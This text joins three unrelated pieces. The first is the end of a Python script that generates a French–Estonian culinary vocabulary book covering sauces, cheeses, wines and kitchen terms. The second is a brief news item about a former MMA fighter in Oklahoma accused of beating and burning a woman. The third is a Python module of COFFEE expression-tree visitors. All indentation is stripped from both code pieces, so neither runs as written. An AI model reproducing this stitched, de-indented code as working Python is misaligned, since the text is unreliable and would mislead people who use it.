le pâté [pa'tee] : pasteet
le pâté en croûte [pa'tee A~'krut] : küpsetatud taignas pasteet
le pâté en terrine [pa'tee A~ter'rin] : küpsetatud pasteet kausis
la galantine [galA~'tin] : galantiin
le cassoulet [kasu'lä] : Languedoc'ist pärit ühepajatoit ubadest ja lihast, mida küpsetatakse mitu tundi madala temperatuuriga ahjus.
le pot-au-feu [poto'föö] : ühepajatoit
""")
Kokadele.add_lesson(u"Juust", u"""""")
Kokadele.parse_words(None,u"""
le fromage [fro'maaž] : juust
la caillebotte [kajə'bott] : (kodujuust)
la raclette [rak'lett] : kuumaga sulatud juust
le Camembert [kamA~'bäär] : (valgehallitusjuust)
le Emmental [emən'taal] : suurte augudega kõva juust
le Rocquefort [rOk'fOOr] : (sinihallitusjuust)
le Gruyère [grüi'jäär] : -
le Edam [e'dam] : -
le Brie [brii] : -
le Parmesan [parmə'zA~] : -
""")
Kokadele.add_lesson(u"Magustoidud", u"""""")
Kokadele.parse_words(Nom,u"""
le dessert [des'säär] : magustoit
la crème [krääm] : koor
la crème fraiche [krääm 'fräš] : rõõsk koor
la crème brûlée [krääm brü'lee] : põletud koor
la crème bavaroise [krääm bavaru'aaz] : muna-piima-seguga kreem želatiiniga
la sauce melba [soos mel'ba] : melba kaste
la sauce vanille [soos va'niijə] : vanillikaste
la sauce caramel [soos kara'mäl] : karamellkaste
la crêpe [kräp] : pannkook
la glace [glass] : jäätis
le sorbet [sor'bä] : jäätis (ilma kooreta)
le parfait [par'fä] : parfee
le gâteau [ga'too] : kook
la gaufre ['goofrə] : vahvel
la tarte [tart] : tort
la compote [kO~'pOt] : kompott
la gelée [žə'lee] : tarretis
la confiture [kO~fi'tüür] : moos | keedis
la mousse [mus] : vaht
la tarte aux prunes [tarto'prün] : ploomikook
la salade de fruits [sa'laad də frü'i] : puuviljasalat
la salade de baies [sa'laad də bä] : marjasalat
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
""")
Kokadele.add_lesson(u"Puuviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le fruit [frü'i] : puuvili
le ananas [ana'na] : ananass
la banane [ba'nan] : banaan
le citron [si'trO~] : sidrun
la orange [o'rA~ž] : apelsin
la pomme [pom] : õun
la poire [pu'aar] : pirn
la prune [prünn] : ploom
la cerise [sə'riiz] : kirss
la noix [nwa] : pähkel
la noisette [nwa'zett] : sarapuupähkel
""")
Kokadele.add_lesson(u"Marjad", u"""""")
Kokadele.parse_words(Nom,u"""
la baie [bä] : mari
la fraise [frääz] : maasikas
la myrtille [mir'tiijə] : mustikas
la mûre [müür] : põldmari
la groseille [gro'zeijə] : sõstar (punane v. valge) | tikker
le cassis [ka'sis] : mustsõstar
""")
Kokadele.add_lesson(u"Juurviljad", u"""""")
Kokadele.parse_words(Nom,u"""
la légume [le'güm] : juurvili
la pomme de terre [pom də 'täär] : kartul
la tomate [to'mat] : tomat
la carotte [ka'rOt] : porgand
# la betterave []
# le panais
# le radis
# le salsifis
# le cerfeuil
la asperge [as'pärž] : spargel
le épinard [epi'naar] : spinat
le concombre [kO~kO~brə]: kurk
le *haricot [ari'ko] : uba
la salade [sa'laadə] : salat
la endive [A~'diiv] : endiiv
# le chicon [ši'kO~] :
le chou [šu] : kapsas
le chou-fleur [šu 'flÖÖr] : lillkapsas
""")
Kokadele.add_lesson(u"Teraviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le blé [blee] : teravili
la avoine [avu'ann] : kaer
le froment [fro'mA~] : nisu
le sarrasin [sara'zÄ~] : tatar
le blé noir [blee'nwaar] : tatar
le riz [ri] : riis
le seigle ['sääglə] : rukis
le orge ['Oržə] : oder
""")
Kokadele.add_lesson(u"Teraviljatooded", u"""""")
Kokadele.parse_words(Nom,u"""
le riz pilaf [ri pi'laf] : pilaff
les pâtes ['paat] : pastaroad
la farine [far'in] : jahu
la bouillie [bui'jii] : puder
le gruau [grü'oo] : puder
le pain [pÄ~] : sai | leib
la tartine [tar'tin] : võileib
la baguette [ba'gät] : prantsuse pikk sai
le croustillon [krusti'jO~] : õlis praetud kohupiimapall
le crouton [kru'tO~] : krutoon
""")
Kokadele.add_lesson(u"Koostisosad", u"""""")
Kokadele.parse_words(Nom,u"""
le ingrédient [Ä~gre'djA~] : koostisosa
le lait [lä] : piim
le beurre [bÖÖr]: või
la crème [kr'ääm] : kreem | koor
le sucre ['sükrə] : suhkur
le sel [säl] : sool
le poivre ['pwaavrə] : pipar
""")
Kokadele.add_lesson(u"Ürdid", u"""""")
Kokadele.parse_words(Nom,u"""
le assaisonnement [asäzon'mA~] : maitsestamine
le condiment [kO~di'mA~] : maitseaine
la épice [e'pis] : vürts
les fines herbes [fin'zärbə] : fines herbes ("peened ürdid")
une herbe [ärbə] : ürt
le persil [pär'sil] : petersell
le céléri [sele'ri] : seller
la gousse d'ail [guss 'daij] : küüslaugu küün
l'ail (m) [aj] : küüslauk
un oignon [on'jO~] : sibul
la ciboulette [sibu'lät] : murulauk
la câpre ['kaaprə] : kappar
le gingembre [žÄ~žA~brə] : ingver
""")
Kokadele.add_lesson(u"Köögis", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisine [kwi'zin] : köök
la cuisinière [kwizin'jäär] : pliit
le four [fuur] : ahi
le four à micro-ondes [fuur a mikro 'O~də] : mikrolaine ahi
le moulin [mu'lÄ~] : veski
le congélateur [kO~gela'tÖÖr] : külmutuskapp
un évier [evi'ee] : kraanikauss
la armoire [arm'waar] : kapp
le placard [pla'kaar] : seinakapp
""")
Kokadele.add_lesson(u"Köögiriistad", u"""""")
Kokadele.parse_words(Nom,u"""
le fouet [fu'ä] : vispel
la louche [lušə] : kulp
la alumette [alu'mätə] : tuletikk
la coquille [ko'kiijə] : merekarp
la cocotte [ko'kot] : malmkastrul, kokott
la poêle [pwal] : pann
la râpe [rap] : riiv
la casserole [kas'roll] : kastrul
la russe [rüs] : kastrul
la marmite [mar'mit] : katel
la braisière [bräz'jäär] : pott smoorimiseks
le caquelon [kak'lO~] : fondüüpott
le bain-marie [bÄ~ma'rii] : veevann
la passoire [pas'waar] : sõel
""")
Kokadele.add_lesson(u"Mida kokk teeb", intro=u"""
""")
Kokadele.parse_words(Verbe,u"""
préparer [prepa'ree] : ette valmistama
# composer [kO~po'zee] : koostama
# baisser [bäs'see] : alla laskma, madaldama
# porter [por'tee] : kandma
laver [la'vee] : pesema
concasser [kO~kas'see] : peenestama (tükkideks)
farcir [far'siir] : farssima (täidisega täitma)
*hacher [a'šee] : hakkima
éplucher [eplü'šee]: koorima
émincer [émÄ~'see] : lõikama viiludeks
tourner [tur'nee] : keerama, pöörama
# utiliser [ütili'zee] : kasutama
préchauffer [préšoo'fee] : ette kütma
""")
Kokadele.add_lesson(u"Pliidil", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisson [küis'sO~] : keetmine
le blanchiment [blA~ši'mA~] : blanšeerimine
le rôtissage [rotis'saaž] : praadimine (panni peal)
le rissolement [risol'mA~] : praadimine
la friture [fri'tüür] : friipraadimine (õlis või rasvas)
le grillage [gri'jaaž] : röstimine
le braisage [bre'zaaž] : smoorimine
""")
#~ le bain marie [bÄ~ ma'rii] :
Kokadele.parse_words(Verbe,u"""
cuire [kwiir] : keetma
blanchir [blA~'šiir] : blanšeerima
rôtir [ro'tiir] : praadima (panni peal)
rissoler [risso'lee]: (rasvas) pruunistama
frire [friir] : praadima (õlis)
griller [gri'jee] : röstima
braiser [brä'zee] : smoorima
""")
if FULL_CONTENT:
General.add_lesson(u"Linnad prantsusmaal",columns=[GEON("Linn"), GEOM, GEOF])
General.parse_words(NomGeographique,u"""
Avignon [avin'jO~] | avignonnais [avinjo'nä] | avignonnaise [avinjo'nääz] : -
Bordeaux [bor'doo] | bordelais [bordə'lä] | bordelaise [bordə'lääz] : -
Bourgogne [burgOnjə] | bourguignon [burgin'jO~] | bourguignonne [burgin'jOnn] : -
Dijon [di'žO~] | dijonnais [dižon'nä] | dijonnaise [dižon'nääz] : -
Lyon [li'O~] | lyonnais [lio'nä] | lyonnaise [lio'nääzə] : -
Marseilles [mar'säijə] | marseillais [marsäi'jä]| marseillaise [marsäi'jääz] : -
Paris [pa'ri] | parisien [pariz'jÄ~]| parisienne [pariz'jän] : Pariis
Reims [rÄ~s] | rémois [rem'wa]| rémoise [rem'waaz] : Reims
Verdun [vär'dÖ~] | verdunois [värdü'nwa]| verdunoise [värdü'nwaaz] : -
Versailles [ver'saj] | versaillais [värsa'jä] | versaillaise [värsa'jääz] : -
""")
#~ Vocabulary.parse_words(NomGeographique,u"""
#~ la France [frA~s] : Prantsusmaa
#~ la Belgique [bel'žik] : Belgia
#~ une Allemagne [al'manjə] : Saksamaa
#~ une Angleterre [A~glə'täär] : Inglismaa
#~ une Estonie [ästo'nii]: Eesti
#~ une Hollande [o'lA~də]: holland
#~ une Espagne [es'panjə]: hispaania
#~ une Italie [ita'lii]: hispaania
#~ """)
#~ Vocabulary.parse_words(Adjectif,u"""
#~ français [frA~'sä] | français [frA~'sääz] : prantsuse
#~ estonien [esto'njÄ~] | estonien [esto'njän] : eesti
#~ espagnol [espan'jol] | espagnole [espan'jol] : hispaania
#~ hollandais [olA~'dä] | hollandaise [olA~'dääz]: holandi
#~ """)
Kokadele.add_lesson(u"Omadussõnad (kulinaaria)", intro=u"""
Selliseid omadussõnu leidub erinevates kulinaaria väljundites.
""",columns=[M, F, ET])
Kokadele.parse_words(Adjectif,u"""
beurré [bÖÖ'ree] | beurrée [bÖÖ'ree]: võiga
braisé [brä'zee] | braisée [brä'zee] : smooritud
coupé [ku'pee] | coupée [ku'pee] : lõigatud
épicé [epi'see] | épicée [epi'see] : vürtsitatud, vürtsikas
glacé [glas'see] | glacée [glas'see] : jäätunud
haché [a'šee] | hachée [a'šee] : hakkitud
manié [man'jee] | maniée [man'jee] : käsitletud
poché [po'še] | pochée [po'šee] : uputatud keeva vette
rissolé [riso'lee] | rissolée [riso'lee] : (rasvas) pruunistatud
sauté [soo'tee] | sautée [soo'tee] : rasvas praetud
velouté [velu'tee] | veloutée [velu'tee] : sametine, sametitaoline
bouilli [bui'ji] | bouillie [bui'jii] : keedetud
croustillant [krusti'jA~] | croustillante [krusti'jA~t] : krõbe
piquant [pi'kA~] | piquant [pi'kA~t] : terav
gourmand [gur'mA~] | gourmande [gur'mA~d] : maiasmokk
paysan [pei'zA~] | paysanne [pei'zann] : talu-, talupoja-
royal [rwa'jal] | royale [rwa'jal] : kuninglik
suprême (mf) [sü'prääm] : ülem, kõrgem, ülim
""")
Kokadele.add_lesson(u"Kastmete valmistamine", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce [soos] : kaste
la moutarde [mu'tardə] : sinep
le vinaîgre [vin'äägrə] : äädikas
la mayonnaise [majo'nääz] : majonees
la vinaîgrette [vine'grät] : vinegrett
le beurre manié [bÖÖr man'jee]: jahuvõi
le roux [ru] : rasvas kuumutatud jahu
le roux blanc [ru blA~] : valge segu
le roux blond [ru blO~] : kollane segu
le roux brun [ru brÖ~] : pruun segu
la sauce espagnole [espan'jOl] : pruun põhikaste
la sauce demi-glace [dəmi'glas] : redutseeritud pruun põhikaste
le jus de rôti [žu də ro'ti] : redutseeritud puljong, "praeliha mahl"
le jus lié [žu li'ee] : maisi või nooljuurejahuga pruun kaste
le mirepoix [mirə'pwa] : praetud kuubikud (sibul, porgand, seller)
la coupe en dés [kup A~ 'dee] : lõikamine kuubikuteks
la coupe en brunoise [kup A~ brün'waaz] : juurvilja lõikamine kuubikuteks (2mm)
la coupe julienne [kup jül'jän] : juurvilja lõikamine ribadeks (2mm)
la coupe jardinière [kup žardin'jäär] : juurvilja lõikamine ribadeks
la coupe à la paysanne [kup ala päi'zan] : juurvilja lõikamine ketasteks
""")
Kokadele.add_lesson(u"Kastmed", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce paysanne [pei'zan] : talupoja kaste
la sauce chasseur [ša'sÖÖr] : jahimehe kaste
la sauce jardinière [žardin'jäär] : aedniku kaste
la sauce piquante [pi'kA~tə] : pikantne kaste
la sauce poivrade [pwav'raadə] : piprakaste
la sauce Grand Veneur [grA~ və'nÖÖr] : jäägri kaste
la sauce Bigarrade [biga'raadə] : apelsinikaste
la sauce smitane [smi'tanə] : hapukoorekaste
la sauce Lyonnaise [lio'nääzə] : pruun sibulakaste
la sauce Bourguignonne [burgin'jOn] : Burgundia kaste
la sauce Robert [ro'bäär] : Roberti kaste
la sauce Madère [ma'däär] : Madeira kaste
la sauce Mornay [mOr'nä] : juustukaste
la sauce Porto [pOr'to] : portveini kaste
la sauce Sabayon [saba'jO~] : Sabayon-kaste
la sauce italienne [ital'jän] : itaalia kaste
la sauce veloutée [vəlu'tee] : hele põhikaste
la sauce blanche [blA~šə] : tuletatud hele kaste
la sauce bordelaise [bOrdə'lääz] : punase veini kaste
la sauce béarnaise [bear'nääz] : bernoo kaste
la sauce béchamel [beša'mäl] : valge põhikaste
la sauce aurore [o'rOOr] : aurorakaste
la sauce Choron [šo'rO~] : choronkaste
la sauce Foyot [fwa'jo] : foyotkaste
la macédoine [mase'dwan] : juurviljasalat
""")
Kokadele.add_lesson(u"Veinialad Prantsusmaal", u"""
""",columns=[FR,PRON])
Kokadele.parse_words(NomGeographique,u"""
Alsace [al'zas] : Elsass
Beaujolais [boožo'lä] : -
Bordeaux [bOr'doo] : -
Bourgogne [bur'gonjə] : -
Champagne [šA~'panjə] : -
Charente [ša'rA~tə] : -
Poitou [pwa'tu] : -
Corse ['korsə] : Korsika
Jura [žü'ra] : -
Savoie [savu'a] : -
Languedoc [lA~gə'dok] : -
Roussillon [russi'jO~] : -
Provence [pro'vA~sə] : -
Sud-Ouest [süd'uest] : -
Gascogne [gas'konjə] : -
Val de Loire [val də 'lwaarə] : Loire'i org
Vallée du Rhône [val'lee dü roonə] : Rhône'i org
""")
Kokadele.add_lesson(u"Prantsuse veinid", u"""
Prantsuse veinid on üle 400, siin ainult mõned.
""",columns=[FR,PRON])
Kokadele.parse_words(Nom,u"""
le Chasselas [šas'la] : -
le Grand Cru [grA~'krü] : -
le Pinot Noir [pi'no nwaar] : -
la Côte de Brouilly [koot də bru'ji] : -
le Saint-Amour [sÄ~ta'muur] : -
le Bordeaux clairet [bOr'doo klä'rä] : -
le Médoc [me'dok] : -
le Saint-Émilion [sÄ~temi'jO~] : -
la Côte de Beaune [koot də boon] : -
les Côtes du Ventoux [kootə du vA~'tu] : -
le Minervois [minerv'wa] : -
les Côtes d'Auvergne [kootə do'värnjə] : -
""")
if FULL_CONTENT:
General.add_lesson(u"Omadussõnad (üld)", intro=u"""
Omadussõnad, mis lõpevad "e"-ga, ei muutu soo järgi.
""",columns=[M, F, ET])
General.parse_words(Adjectif,u"""
chaud [šoo] | chaude [šoodə] : kuum
froid [fru'a] | froide [fru'aadə] : külm
gros [gro] | grosse [grossə] : paks
mince (mf) [mÄ~s] : õhuke
bon [bO~] | bonne [bonnə] : hea
beau [boo] | belle [bälə] : ilus
joli [žo'li] | jolie [žo'lii] : ilus
demi [də'mi] | demie [də'mii]: pool
entier [A~'tjee] | entière [A~'tjäär] : terve, täis
double (mf) ['duublə] : topelt
facile (mf) [fa'sil] : lihtne
possible (mf) [po'siblə] : võimalik
""")
General.add_lesson(u"Loeme kümneni", intro=u"""""")
General.parse_words(Numerique,u"""
un [Ö~] : üks
deux [döö] : kaks
trois [trwa] : kolm
quatre [katrə] : neli
cinq [sÄ~k] : viis
six [sis] : kuus
sept [sät] : seitse
huit [üit] : kaheksa
neuf [nÖf] : üheksa
dix [dis] : kümme
""")
General.add_lesson(u"Värvid", columns=[M, F, ET])
General.parse_words(Adjectif,u"""
brun [brÖ~] | brune [brün] : pruun
vert [väär] | verte [värtə] : roheline
bleu [blöö] | bleue [blöö] : sinine
rouge (mf) [ruuž] : punane
jaune (mf) [žoon] : kollane
blond [blO~] | blonde [blO~də] : blond
beige (mf) [bääž] : beež
orange (mf) [o'rA~ž] : oranž
blanc [blA~] | blanche [blA~š] : valge
noir [nwaar] | noire [nwaar] : must
""")
General.add_lesson(u"Kuud")
General.parse_words(NomPropre,u"""
janvier [žA~vi'ee] : jaanuar
février [fevri'ee] : veebruar
mars [mars] : märts
avril [a'vril] : aprill
mai [mä] : mai
juin [žwÄ~] : juuni
juillet [žwi'jä] : juuli
août [ut] : august
septembre [sep'tA~brə] : september
octobre [ok'tOObrə] : oktoober
novembre [no'vA~brə] : november
décembre [de'sA~brə] : detsember
""")
u"""
On met une majuscule
uniquement quand l'adjectif est employé comme
nom pour désigner une personne.
Ex. : Les Français parlent en français à leurs amis français
"""
General.add_lesson(u"Riigid",columns=[GEON("Riik"), GEOM, GEOF, ET])
General.parse_words(None,u"""
la France [frA~s] | français [frA~'sä] | française [frA~'sääz] : Prantsusmaa
l'Estonie (f) [ästo'nii] | estonien [esto'njÄ~] | estonienne [esto'njän] : Eesti
l'Allemagne (f) [al'manjə] | allemand [al'mA~]| allemande [al'mA~də] : Saksamaa
l'Angleterre (f) [A~glə'täär] | anglais [A~'glä]| anglaise [A~'glääz] : Inglismaa
la Belgique [bel'žik] | belge [belžə]| belge [belžə] : Belgia
la *Hollande [o'lA~də] | hollandais [olA~'dä] | hollandaise [olA~'dääz] : Holland
l'Espagne (f) [es'panjə] | espagnol [espan'jol] | espagnole [espan'jol] : Hispaania
l'Italie (f) [ita'lii] | italien [ital'jÄ~]| italienne [ital'jen] : Itaalia
""")
if FULL_CONTENT:
General.add_lesson(u"Kuulsad inimesed")
General.parse_words(NomPropre,u"""
Jacques Chirac [žaak ši'rak] : # endine president
Georges Brassens [žorž bra'sÄ~s] : # laulja
Brigitte Bardot [bri'žit bar'do] : # laulja
Louis de Funès [lu'i də fü'nääz] : # näitleja
""")
General.add_lesson(u"Majad ja nende osad")
General.parse_words(Nom,u"""
la maison [mä'zO~] : maja
la cave [kaav] : kelder
la cuisine [kwi'zin] : köök
la salle de bain : vannituba
la chambre à coucher : magamistuba
le salon [sa'lO~] : elutuba
un escalier [eskal'jee] : trepp
la fenêtre [fə'näätrə] : aken
le parterre [par'täär] : esimene korrus
le premier étage [prəm'jeer_etaaž] : teine korrus
le jardin [žar'dÄ~] : aed
""")
if FULL_CONTENT:
Fun.add_lesson(u"Devinettes", intro=u"""
#. Que dit un vampire en quittant sa victime?
-- Merci beau cou.
#. Pourquoi les marins se marient-ils ?
-- Pour avoir une belle mer (mère).
""")
Fun.add_lesson(u"Virelangues", intro=u"""
#. Un chasseur sachant chasser doit savoir chasser sans son chien. ([ref s])
#. Chacun cherche son chat.
#. Poisson sans boisson est poison.
#. Ecartons ton carton, car ton carton me gêne.
#. Ton thé t'a-t-il ôté ta toux?
#. Tante, en ton temps teintais-tu tes tempes?
#. Les poules couvent souvent au couvent.
""")
Fun.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
le poison [pwa'zO~] : mürk
la boisson [bwa'sO~] : jook
le chasseur [ša'sÖÖr] : jahimees
le chien [šiÄ~] : koer
la toux [tu] : köha
""")
Fun.parse_words(Verbe,u"""
savoir [sa'vuaar] : teadma | oskama
chercher [šär'šee] : otsima
écarter [ekar'tee] : eest ära liigutama
ôter [oo'tee] : ära võtma
""")
Fun.parse_words(Autre,u"""
sans [sA~] : ilma
chacun [ža'kÖ~] : igaüks
""")
if FULL_CONTENT:
General.add_lesson(u"Lisa", intro=u"""
""")
General.parse_words(Autre,u"""
environ [A~vi'rO~] : umbes
facilement [fasil'mA~] : lihtsalt
rapidement [rapidə'mA~]: kiiresti
le autre [ootrə] : teine
le même [määm] : sama
""")
General.parse_words(Verbe,u"""
filer [fi'lee] : ketrama
baiser [bä'zee] : musitama
sauter [soo'tee] : hüppama
""")
General.parse_words(Nom,u"""
le midi [mi'di] : lõun | keskpäev
le soir [swaar] : õhtu
le matin [ma'tÄ~] : hommik
la tranche [trA~š] : lõik | viilukas
la coupe [kupp] : lõikamine | pokaal
la ébullition [ebüjis'jO~] : keemine
le feu [föö] : tuli
le baiser [bä'zee] : suudlus
le appétit [appe'ti] : isu
""")
unused = u"""
une aurore [or'Or] : koit
le fil [fil] : niit | lõng | nöör
une heure [ÖÖr] : tund
le dauphinois [dofinw'a] : lõunaprantsuse dialekt
"""
if HAS_EXERCICES:
Exercices.add_lesson(u"Lugeda oskad?", u"""
Õpetaja kirjutab tahvlile sari hääldamiskirjeldusi.
Õpilased loevad ette.
Ainult lugeda, mitte tõlkida.
""")
Exercices.parse_words(None,u"""
au clair de lune [okläärdə'lün] : kuuvalguses
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le dessert [des'säär] : magustoit
la mousse au chocolat [musošoko'la] : šokoladivaht
le pot-au-feu [poto'föö] : ühepajatoit
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
la sauce chasseur [soos ša'sÖÖr] : jahimehe kaste
Poitou [pwa'tu] : -
la sauce italienne [soosital'jän] : itaalia kaste
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
""")
Exercices.add_lesson(u"Kirjutada oskad?", u"""
Õpetaja loeb ette sari sõnu.
Õpilased kirjutavad paberile, kasutades hääldamiskirjelduse tähestik.
""")
Exercices.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le soleil [so'leij] : päike
la boisson [bwa'sO~] : jook
le poisson [pwa'sO~] : kala
le requin [rə'kÄ~] : haikala
la cuillère [kwi'jäär] : lusikas
""")
if output_format == "rst":
Files = book.add_section(u"Failid",intro=u"""
Neid faile saad alla laadida ja kuulata koos trükitud lehtedega:
- `lk. 5 <dl/lk05.mp3>`_
- `lk. 6 <dl/lk06.mp3>`_
- `lk. 7 <dl/lk07.mp3>`_
- `lk. 8 <dl/lk08.mp3>`_
""")
if __name__ == '__main__':
if output_format == "rst":
book.add_index(u"Sõnaraamat")
book.write_rst_files(sys.argv[2])
elif output_format == "odt":
if False:
book.add_dictionary(u"Sõnade nimekiri")
fn = sys.argv[2]
book.write_odt_file(fn)
os.startfile(fn)
|
DURANT, Okla. – A former MMA fighter will head to trial after being accused of violently beating a woman and setting her on fire.
In March, authorities arrested Nehemiah Hellems after neighbors discovered the 50-year-old woman in the street.
Investigators say Hellems was reportedly upset over drugs.
When the neighbors found the woman on the street, they rushed to help her.
According to KXII, the victim took the stand on Tuesday and told the court that she loves and forgives Hellems.
In spite of the testimony, the judge ordered the case to go to trial in July.
|
from __future__ import absolute_import
import itertools
import operator
from copy import deepcopy
from collections import OrderedDict, defaultdict
import numpy as np
from coffee.visitor import Visitor
from coffee.base import Sum, Sub, Prod, Div, ArrayInit, SparseArrayInit
from coffee.utils import ItSpace, flatten
__all__ = ["ReplaceSymbols", "CheckUniqueness", "Uniquify", "Evaluate",
"EstimateFlops", "ProjectExpansion"]
class ReplaceSymbols(Visitor):
"""Replace named symbols in a tree, returning a new tree.
:arg syms: A dict mapping symbol names to new Symbol objects.
:arg key: a callable to generate a key from a Symbol, defaults to
the string representation.
:arg copy_result: optionally copy the new Symbol whenever it is
used (guaranteeing that it will be unique)"""
def __init__(self, syms, key=lambda x: str(x),
copy_result=False):
self.syms = syms
self.key = key
self.copy_result = copy_result
super(ReplaceSymbols, self).__init__()
def visit_Symbol(self, o):
try:
ret = self.syms[self.key(o)]
if self.copy_result:
ops, okwargs = ret.operands()
ret = ret.reconstruct(ops, **okwargs)
return ret
except KeyError:
return o
def visit_object(self, o):
return o
visit_Node = Visitor.maybe_reconstruct
class CheckUniqueness(Visitor):
"""
Check if all nodes in a tree are unique instances.
"""
def visit_object(self, o, seen=None):
return seen
# Some lists appear in operands()
def visit_list(self, o, seen=None):
# Walk list entrys
for entry in o:
seen = self.visit(entry, seen=seen)
return seen
def visit_Node(self, o, seen=None):
if seen is None:
seen = set()
ops, _ = o.operands()
for op in ops:
seen = self.visit(op, seen=seen)
if o in seen:
raise RuntimeError("Tree does not contain unique nodes")
seen.add(o)
return seen
class Uniquify(Visitor):
"""
Uniquify all nodes in a tree by recursively calling reconstruct
"""
visit_Node = Visitor.always_reconstruct
def visit_object(self, o):
return deepcopy(o)
def visit_list(self, o):
return [self.visit(e) for e in o]
class Evaluate(Visitor):
@classmethod
def default_retval(cls):
return OrderedDict()
"""
Symbolically evaluate an expression enclosed in a loop nest, provided that
all of the symbols involved are constants and their value is known.
Return a dictionary mapping symbol names to (newly created) Decl nodes, each
declaration being initialized with a proper (newly computed and created)
ArrayInit object.
:arg decls: dictionary mapping symbol names to known Decl nodes.
:arg track_zeros: True if the evaluated arrays are expected to be block-sparse
and the pattern of zeros should be tracked.
"""
default_args = dict(loop_nest=[])
def __init__(self, decls, track_zeros):
self.decls = decls
self.track_zeros = track_zeros
self.mapper = {
Sum: np.add,
Sub: np.subtract,
Prod: np.multiply,
Div: np.divide
}
from coffee.vectorizer import vect_roundup, vect_rounddown
self.up = vect_roundup
self.down = vect_rounddown
super(Evaluate, self).__init__()
def visit_object(self, o, *args, **kwargs):
return self.default_retval()
def visit_list(self, o, *args, **kwargs):
ret = self.default_retval()
for entry in o:
ret.update(self.visit(entry, *args, **kwargs))
return ret
def visit_Node(self, o, *args, **kwargs):
ret = self.default_retval()
for n in o.children:
ret.update(self.visit(n, *args, **kwargs))
return ret
def visit_For(self, o, *args, **kwargs):
nest = kwargs.pop("loop_nest")
kwargs["loop_nest"] = nest + [o]
return self.visit(o.body, *args, **kwargs)
def visit_Writer(self, o, *args, **kwargs):
lvalue = o.children[0]
writes = [l for l in kwargs["loop_nest"] if l.dim in lvalue.rank]
# Evaluate the expression for each point in in the n-dimensional space
# represented by /writes/
dims = tuple(l.dim for l in writes)
shape = tuple(l.size for l in writes)
values, precision = np.zeros(shape), None
for i in itertools.product(*[range(j) for j in shape]):
point = {d: v for d, v in zip(dims, i)}
expr_values, precision = self.visit(o.children[1], point=point, *args, **kwargs)
# The sum takes into account reductions
values[i] = np.sum(expr_values)
# If values is not expected to be block-sparse, just return
if not self.track_zeros:
return {lvalue: ArrayInit(values)}
# Sniff the values to check for the presence of zero-valued blocks: ...
# ... set default nonzero patten
nonzero = [[(i, 0)] for i in shape]
# ... track nonzeros in each dimension
nonzeros_bydim = values.nonzero()
mapper = []
for nz_dim in nonzeros_bydim:
mapper_dim = defaultdict(set)
for i, nz in enumerate(nz_dim):
point = []
# ... handle outer dimensions
for j in nonzeros_bydim[:-1]:
if j is not nz_dim:
point.append((j[i],))
# ... handle the innermost dimension, which is treated "specially"
# to retain data alignment
for j in nonzeros_bydim[-1:]:
if j is not nz_dim:
point.append(tuple(range(self.down(j[i]), self.up(j[i]+1))))
mapper_dim[nz].add(tuple(point))
mapper.append(mapper_dim)
for i, dim in enumerate(mapper[:-1]):
# Group indices iff contiguous /and/ same codomain
ranges = []
grouper = lambda (m, n): (m-n, dim[n])
for k, g in itertools.groupby(enumerate(sorted(dim.keys())), grouper):
group = map(operator.itemgetter(1), g)
ranges.append((group[-1]-group[0]+1, group[0]))
nonzero[i] = ranges or nonzero[i]
# Group indices in the innermost dimension iff within vector length size
ranges, grouper = [], lambda n: self.down(n)
for k, g in itertools.groupby(sorted(mapper[-1].keys()), grouper):
group = list(g)
ranges.append((group[-1]-group[0]+1, group[0]))
nonzero[-1] = ItSpace(mode=1).merge(ranges or nonzero[-1], within=-1)
return {lvalue: SparseArrayInit(values, precision, tuple(nonzero))}
def visit_BinExpr(self, o, *args, **kwargs):
ops, _ = o.operands()
transformed = [self.visit(op, *args, **kwargs) for op in ops]
if any([a is None for a in transformed]):
return
values, precisions = zip(*transformed)
# Precisions must match
assert precisions.count(precisions[0]) == len(precisions)
# Return the result of the binary operation plus forward the precision
return self.mapper[o.__class__](*values), precisions[0]
def visit_Par(self, o, *args, **kwargs):
return self.visit(o.child, *args, **kwargs)
def visit_Symbol(self, o, *args, **kwargs):
try:
# Any time a symbol is encountered, we expect to know the /point/ of
# the iteration space which is being evaluated. In particular,
# /point/ is pushed (and then popped) on the environment by a Writer
# node. If /point/ is missing, that means the root of the visit does
# not enclose the whole iteration space, which in turn indicates an
# error in the use of the visitor.
point = kwargs["point"]
except KeyError:
raise RuntimeError("Unknown iteration space point.")
try:
decl = self.decls[o.symbol]
except KeyError:
raise RuntimeError("Couldn't find a declaration for symbol %s" % o)
try:
values = decl.init.values
precision = decl.init.precision
shape = values.shape
except AttributeError:
raise RuntimeError("%s not initialized with a numpy array" % decl)
sliced = 0
for i, (r, s) in enumerate(zip(o.rank, shape)):
dim = i - sliced
# Three possible cases...
if isinstance(r, int):
# ...the index is used to access a specific dimension (e.g. A[5][..])
values = values.take(r, dim)
sliced += 1
elif r in point:
# ...a value is being evaluated along dimension /r/ (e.g. A[r] = B[..][r])
values = values.take(point[r], dim)
sliced += 1
else:
# .../r/ is a reduction dimension
values = values.take(range(s), dim)
return values, precision
class ProjectExpansion(Visitor):
@classmethod
def default_retval(cls):
return list()
"""
Project the output of expression expansion.
The caller should provid a collection of symbols C. The expression tree (nodes
that are not of type :class:`~.Expr` are not allowed) is visited and a set of
tuples returned, one tuple for each symbol in C. Each tuple represents the subset
of symbols in C that will appear in at least one term after expansion.
For example, be C = [a, b], and consider the following input expression: ::
(a*c + d*e)*(b*c + b*f)
After expansion, the expression becomes: ::
a*c*b*c + a*c*b*f + d*e*b*c + d*e*b*f
In which there are four product terms. In these terms, there are two in which
both 'a' and 'b' appear, and there are two in which only 'b' appears. So the
visit will return [(a, b), (b,)].
:arg symbols: the collection of symbols searched for
"""
def __init__(self, symbols):
self.symbols = symbols
super(ProjectExpansion, self).__init__()
def visit_object(self, o, *args, **kwargs):
return self.default_retval()
def visit_Expr(self, o, parent=None, *args, **kwargs):
projection = self.default_retval()
for n in o.children:
projection.extend(self.visit(n, parent=o, *args, **kwargs))
ret = []
for n in projection:
if n not in ret:
ret.append(n)
return ret
